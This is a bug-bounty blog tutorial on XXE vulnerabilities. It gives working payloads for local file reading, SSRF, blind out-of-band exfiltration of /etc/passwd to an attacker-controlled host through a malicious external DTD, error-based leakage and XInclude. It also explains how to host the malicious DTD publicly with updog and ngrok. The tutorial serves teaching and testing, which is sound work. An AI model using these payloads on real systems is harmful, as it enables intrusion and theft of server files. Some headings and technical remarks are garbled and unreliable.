Bug Bounty

XML External Entities (XXE): Unleashing the Power of XML

ayush khatkar

Jul 8, 2024 • 15 min read

XML External Entities (XXE) is a type of web vulnerability that allows attackers to exploit weaknesses in how an application parses XML input. Think of it as a secret passage hidden within the structure of an XML document, waiting to be discovered and exploited by a cunning adversary.

Understanding XXE: The Basics

XML, or Extensible Markup Language, is a widely used format for storing and transmitting data. XML documents can include declarations of external entities, which are references to external resources like files or URLs. XXE vulnerabilities arise when an XML parser, the software that processes XML documents, blindly processes these external entities without proper security checks.

The Anatomy of an XXE Attack

1. Malicious XML Input: The attacker crafts an XML document that includes a declaration of an external entity. This entity can reference a sensitive file on the server, a remote system, or even trigger actions like port scanning.
2. XML Parsing: The vulnerable application parses the XML input, including the external entity declaration.
3. Entity Resolution: The XML parser resolves the external entity by fetching the referenced resource.
4. Attacker's Gain: Depending on the nature of the external entity, the attacker can:
    ○ Read the contents of sensitive files on the server (e.g., /etc/passwd)
    ○ Make requests to internal systems or services (SSRF)
    ○ Perform port scanning or other network reconnaissance
    ○ Cause a denial of service (DoS) by triggering recursive entity expansion

Types of XXE Attacks

1. In-band XXE: The attacker receives the results of their attack directly through the application's response.
2. Out-of-band XXE: The attacker receives the results of their attack through a different channel, such as an external server they control.
3. Blind XXE: The attacker cannot see the results of their attack directly, but can infer them based on the application's behavior.

Impact of XXE Attacks

XXE attacks can have severe consequences, including:

○ Data Breach: Attackers can access sensitive data, such as passwords, credit card numbers, or confidential business information.
○ Server-Side Request Forgery (SSRF): Attackers can force the server to make requests to internal systems or services, potentially bypassing firewalls and access controls.
○ Denial of Service (DoS): Attackers can cause a DoS attack by triggering recursive entity expansion, consuming excessive server resources.
○ Remote Code Execution (RCE): In some cases, XXE can be used to execute arbitrary code on the server, allowing the attacker to take complete control.

Identifying and Exploiting XXE Vulnerabilities

Manual Testing:
    ○ Identify input points that accept XML data.
    ○ Inject XML payloads containing external entity declarations.
    ○ Observe the application's response for signs of successful exploitation, such as error messages or unexpected data.
Automated Scanning:
    ○ Use web vulnerability scanners like Burp Suite or OWASP ZAP to automate the process of finding XXE vulnerabilities.

Example Payloads:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

Mitigating XXE Attacks

○ Disable External Entity Processing: Configure your XML parser to disable the processing of external entities.
○ Input Validation: Validate and sanitize all XML input to prevent malicious entity declarations.
○ Use Less Complex Data Formats: If possible, consider using less complex data formats like JSON, which are not vulnerable to XXE.

Testing Methodology:

1. Identify Potential Entry Points:
○ Look for functionalities that process XML data, especially those that accept XML input from users or external sources. Common examples include:
● XML uploads: File upload forms that accept XML files.
● XML APIs: REST or SOAP APIs that take XML data as input.
● XML-based configuration files: Applications that load configuration settings from XML files.
● SOAP web services: Services that use SOAP (Simple Object Access Protocol), which is based on XML.

2. Craft XXE Payloads:

● Basic XXE:

○ Inject a basic external entity declaration into the XML input:

            <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
            <test>&xxe;</test>

If vulnerable, the application might return the contents of the "/etc/passwd" file.

● Parameter Entity:

○ Inject a parameter entity to expand within the DTD (Document Type Definition):

    <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/passwd"> %xxe; ]>
    <test></test>

● Blind XXE (Out-of-Band):

○ If the application doesn't directly return the entity's content, use an external DTD and send the results to a system you control:

    <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://your-server.com/evil.dtd"> %xxe; ]>
    <test></test>

3. Bypass Techniques:
● URL Encoding: Encode special characters like spaces and newlines to bypass filters.
● Variations in Entity Declarations: Experiment with different syntaxes and entity types (parameter entities, general entities) to evade detection.

Real-World Examples:

● Content Management Systems (CMS):Many CMS platforms use XML for configuration or data storage, making them potential targets for XXE attacks.
● Web Services: SOAP-based web services that accept XML input may be vulnerable to XXE injection.
● Document Processing: Applications that process XML documents, like online editors or file converters, might be susceptible to XXE attacks if they don't properly validate input.

Tools:

● Burp Suite: Use Burp Suite's proxy and repeater features to intercept and modify XML requests.
● xxeinjector: An automated XXE vulnerability scanner.
● XXExploiter: A tool for generating and delivering XXE payloads.
● Fuzzers: General-purpose fuzzers can be used to test XML input for unexpected behavior or errors.

XSS in Bug Hunting

For XML External Entity, use XXE. First, it's important to realize that XXE can only be used in applications that handle XML data on the client or server side. Moreover, keep in mind that XML file types include docx, xlsx, and pptx. XXE entails taking use of the way the program handles input that contains external things. An XXE can be used to call on a malicious server or to retrieve data from a server.File uploading can also be used to abuse XXE. If everything seems overwhelming, just unwind and continue reading.

How does the XXE vulnerability happens?

If an application transfers or stores data in XML between a browser and a server, and the XML specification includes a number of potentially harmful capabilities that standard parsers support, this could result in XXE.

Let's first study about XML, entities, and DTD before moving on to XXE.

Extensible Markup Language is known as XML.

Although XML and HTML have a similar appearance, XML has custom tags and does not have any predefined tags. It's also crucial to remember that HTML allows us to open and close certain tags while maintaining functionality.For example, the title <h1> Can be used without the ending </h1> tag. However, with XML, every tag must be closed.

XML-Based Entities:

In order to represent data in XML, we utilize XML entities. As seen in the illustration, add1 and add2 are XML entities that contain address-based data. If you have any experience with programming, you may think of it as a variable that holds data, which we call using the notation "&ENTITY_NAME;" anytime we need that data in the output. As you can see, we called add1 on line 11 by using &add1; James' address, name, and phone number will now appear in the answer.

Document Type Definition, or DTD:

Declarations found in DTDs can specify an XML document's structure, allowable data types and values, and other things.

The DTD can be entirely contained within the document (referred to as a "internal DTD"), loaded from another location (referred to as a "external DTD"), or a combination of the two.

In the example above, a DTD is specified in relation to an application's customer structure. Additionally, since the values for add1 and add2 are loaded from the database itself rather than an external source (URL/URI), it is an example of an internal DTD.

A DTD is considered external if it attempts to load data from sources other than itself. In this scenario, the SYSTEM keyword is used to tell the DTD to load data from the specified URI.

loading data, for example, from an external URL
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://vulnerable.com/some-data" > ]>

or obtaining data directly from the server.
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///path/to/file" > ]>

XML data from these URIs will now be loaded in response to the application whenever &xxe is called.

We will now attempt to load data from an external source by abusing these Entities features. (XXE, or XML External Entity)

These days, Portswigger offers excellent laboratories for testing what you've learned. I'll proceed from fundamental labs to sophisticated xxe injection.

PS: You will need to complete the lab solutions on your own; I will not be creating them for you. Furthermore, there is no need in giving out the solutions to these labs since they are already available in a ton of blogs and videos. You study, gain knowledge, and take use of yourself.

Now, here are few things you can accomplish if a web is vulnerable to XXE:

○ Exfiltrate data from server like reading content of /etc/passwd etc.
○ Achieve SSRF by XXE by telling the server to load data from internal urls, as request is originating from server itself you will be able to hit internal urls.
○ Exfiltrate data by making request to your server(out of band request), if application doesn’t allow regular entities(e.g. &xxe) or don’t display display any output of your xxe paylaod meaning it’s a Blind XXE you confirm that by making out of band request.
○ Forcing the application to cause error and load your XXE ouput along with system error.

XXE being exploited to extract files

LAB 1: Using XXE to Extract Files: https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files

You can now see that this application receives and processes XML data here. So let's investigate its vulnerability.

(I'm going to assume you are familiar with intercepting traffic and testing request flow. If not, start by learning that.)

Let's present our DTD using XML data.

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

Here, a DTD is defined to load data from an external source into our variable/entity xxe. SYSTEM functions similarly to http://, and file://

This DTD here is instructing the XML parser to load data from /etc/passwd and display it whenever &xxe; is called.

You can request any information from the server that a web user can access. such as hostname, /etc/, etc. If the server is a linux server alone, you can provide any linux path here after file://.

This is how a XXE looks in a web server.

Using XXE as a means of SSRF attacks

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable.com/"> ]>

PS: There is no syntactical restriction on the name you can use in place of foo.

The xxe object in this DTD is attempting to load data from an internal URL, which may be anything. If the server makes use of cloud services, you can even load its cloud information in this manner. I would advise learning from and taking lessons from this fantastic repository if you don't already know the fundamentals of SSRF.

XXE Blind vulnerabilities

This indicates that although the application is vulnerable, it is not feasible to directly retrieve server-side files because it does not return the values of any identified external entities in its answers. Simply put, you cannot read the contents of /etc/passwd directly. Rather, you will need to load the contents from /etc/passwd and send it to your server via an Out of Band request as a parameter. Portswigger offers an exploit server at these labs.

I believe that portswigger overcomplicated things a little bit. If you can decipher their answer, they frequently employ both Burp Commander and Exploit Server, among other tricky techniques. You are more than welcome to use that approach if that is how you work. Not how to abuse XXE is what I'm here to discuss.

I just used the exploit server to deliver the payload and collect the output for my exploit server log because I like to keep things simple.

Right now prior to releasing your payload onto the server, check sure the application is capable of submitting an Out of Band request. You only need to provide a harmless URL for your server in an XML entity, and then keep an eye out to see if the victim server has sent you any GET requests.

Now for the useful part: Simply send in this DTD as an XML body.

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://test.attacker.com"> ]>

I assume that you have a good idea of what's going on by now. A DTD with an entityy xxe is defined, and it sends a request to your exploit or burp collab server. Simply dial this xxe entity and watch for the collaborative DNS and HTTP requests. You can only view receive requests, not DNS requests, when there is an exploit server.

Note: Only if your own DNS server is up and running on your IP address are DNS lookups visible. Portswigger prohibits communication with external servers due to security concerns. Thus, you can only utilize their server.

Entities with parameters:

Regular entity usage may be blocked by XML parsers or the program itself, thus you can't simply define an entity called xxe and call it with &xxe;

You must use parametric entities in this situation, which are referenced within the DTD.

The percent character appears before the entity name in the declaration of an XML parameter entity:

<!ENTITY % xxe "parameter value" >

and you will use %xxe; (calling the entity) to refer to this entity.

Using a parametric entity, the DTD will appear as follows to check for out-of-band requests:

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://test.attacker.com"> %xxe; ]>

Note: In this case, entity calling occurs only inside the DTD.

You'll observe communication between the victim server and your server.

Utilizing blind XXE to obtain data outside of the band

Sensitive information will be loaded into an object and sent as a parameter to your server's URL because the program was not returning any results for xxe.

Thus, we will exfiltrate some data from the victim server after identifying the Blind XXE. This is a multi-step process that has two possible outcomes. First, let's examine portswigger one.

1. We'll send a request to our exploit server on an endpoint that already hosts a DTD file.
2. Currently, this dtd file contains malicious XML code that imports sensitive data upon parsing and uses that data to send a request to your server.

Simply insert this DTD into XML data.

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/malicious.dtd"> %xxe;]>

Put your exploit server url/exploit in lieu of the URL.

Calling your entity with this %xxe; will send a request to your exploit server, which is hosting a dtd file with the content that follows.

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?p=%file;'>">
%eval;
%exfiltrate;

Put your exploit server URL in lieu of URL.

Initially, a file parameter entity loads the contents of /etc/passwd by requesting an XML file.
After that, we construct a second entity called eval, whose value is itself an entity, therefore we HTML encoded the % to �. Handle quotations and brackets with care.
At this point, %eval is called, creating the url dynamically and passing data as an argument to it.
At last, %exfiltrate submits the request to the created URL.

The contents of /etc/passwd in the server log will be sent to you.

An further approach would be:

<!DOCTYPE data [ <!ENTITY % file SYSTEM “file:///etc/passwd”> <!ENTITY % dtd SYSTEM “http://attacker.com/evil.dtd">%dtd; ]>

Two entities have been defined here. one is asking the attacker server, which is hosting a malicious DTD file, which file to load, and the other is sending a request to that server.

evil.dtd:

<!ENTITY % all “<!ENTITY send SYSTEM ‘http://attacker.com/?collect=%file;'>">

%all;

The two differences are as follows: first, the dynamically formed send entity is not a parameteric entity and needs to be called in an XML request with &send; in order to send the data to the attacker server. Second, we are not requesting which file to load in the DTD file because we already did so in the XML request.

Exfiltration through an error message

We can force an error in xml parsing and the application will display the error along with our xe output if it displays all errors that occurred in the response.

e.g.

<!ENTITY % file SYSTEM “file:///etc/passwd”>
<!ENTITY % eval “<!ENTITY &#x25; error SYSTEM ‘file:///null/%file;’>”>
%eval;
%error;

Here, we first invoke a malicious server's external DTD (we won't write it again).

Now, the content of /etc/passwd is loaded by the malicious dtd.
Create a URL /null/%file dynamically, and load the contents of /etc/passwd as a parameter into it.
A request for the URL results in an error because the path /null/ is invalid.

So the error not found / null/ <output of / etc/passwd> appears in the final output.

Repurposing a local DTD to blind XXE

Consider a scenario where only blind xxe is feasible and normal xxe is not achievable. Firewall blocks Out-of-Band requests even in Blind XXE.

What is the solution in this case? To prevent out-of-band connections, certain applications may block HTTP requests. then you search for DNS lookups pointing to your server. We require a VPS in order to watch for DNS lookups. You can Google how to make your VPS available for XXE exploits and check its logs if you can manage a good VPS.

What would happen if you couldn't have a DNS server or even if DNS lookups were prohibited? Thus, we can reuse local DTD on the server in the event of Blind XXE and No out of Band request.

This indicates that we have located a DTD that is currently hosted on the server.(Every Linux and Windows computer has a DTD, the majority of whose code is open source).

We select an entity from the DTD we located, restructure its structure, and intentionally introduce an issue such that our xxe data is sent back to the server along with the problem.

Every XML entity is constant, and XML will parse the first one if two entities with the same name are defined. As a result, in our instance, the entity definition we provide takes precedence over the one found in the server's DTD.

<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
<!ENTITY % custom_entity '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///null/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>

Although it appears complicated here, I'll explain it to you.

The local_dtd variable loads an existing DTD file.
We select an entity with the name custom_entity from this DTD.
We then dynamically create a new entity within custom_entity to load content from /etc/passwd.
To make an error, another object must construct another one inside it called error.

Since everything is contained within the custom_entity definition, it is all HTML encoded. As you can see, the entities within custom_entity resemble the ones we wrote in XXE with the error message in the part before. The only distinction is that everything is HTML encoded and defined using custom entities.

**Here are some intriguing locations to search for XXEs: **

XInclude attacks:

The idea behind this attack is straightforward: what would happen if an application didn't use XML to transfer data from client to server? Consequently, neither writing a DTD nor using Blind XE is feasible. Because in this case, you just don't have control over the XML.

How would a server handle user-supplied data in a SOAP request in the back end? XML is also used in SOAP requests, and the XML entities are parsed.

XInclude, which is used to construct huge XML documents from smaller, independent smaller XML documents, can be used in this situation.

Therefore, we can provide an XML input that will be parsed as an XML on the back end.

Naturally, you can't tell which parameter is sensitive in real life, so you have to test the parameters and see which one affects the response.

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

Attacks with XXE files uploaded:

Watch out for file types that applications allow and whether they can be misused for XXE, such as DOCX, XLSX sheets, ppts, and XML files.

Applications that support jpg and png files may also support scg files.

Find xxe using the svg file. Do the lab for Portswigger.

By type of content, XXE:

More accurately, it's testing whether the application accepts the xml and document; if it does, proceed with the xxe testing on the application.

Now, if you're like me and want to test out genuine applications for out-of-band requests and delivering malicious DTD by putting them on your server, but you don't have a VPS. I may have something special for you:

Set up ngrok on your computer.

A publicly accessible IP address is required to exploit the OUT OF BAND REQUEST; ngrok will be used to do so.

Use updog to host the DTD file locally.

python simplehttpserver 80 something is comparable, but forget about creating all that.

Simply install Updog using

pip3 install updog

Simply type a malicious DTD to suit your needs, then host it using Updog.

updog

Updog's default IP address is 9090, however you can modify it to any port.

We must now make our DTD file publicly available as we are hosting it.

ngrok http 9090

It will generate a one-of-a-kind URL for you that loads to your local server on port 9090 and is publicly accessible via the internet.

Simply build a malicious DTD using your ngrok url and use updog to host it again on port 9090. Should you encounter an address already in use error. Simply force terminate that process and launch it anew using updog on port 9090 or any other port of your choosing.

If HTTP requests are banned, the issue of detecting XXE using DNS lookups remains unresolved. In that case, a VPS is required and there is nothing we can do about it.

Hello, however, you are now prepared to test XXE with external entities, Blind XXE with out-of-band requests, error-based XXE, Xinclude XXE, and file upload XXE.

I'm hoping this will learn you something! Since you can't learn something in a day, use it as a guide and give yourself at least a week to get it. Repeatedly read this, complete all of the XXE labs, then search up any confusing concepts on Google.

Happy hunting!

Author: Ayush khatkar is a cybersecurity researcher, technical writer and an enthusiastic pen-tester at Asecurity. Contact here.

#bugbounty #infosec #cybersecurity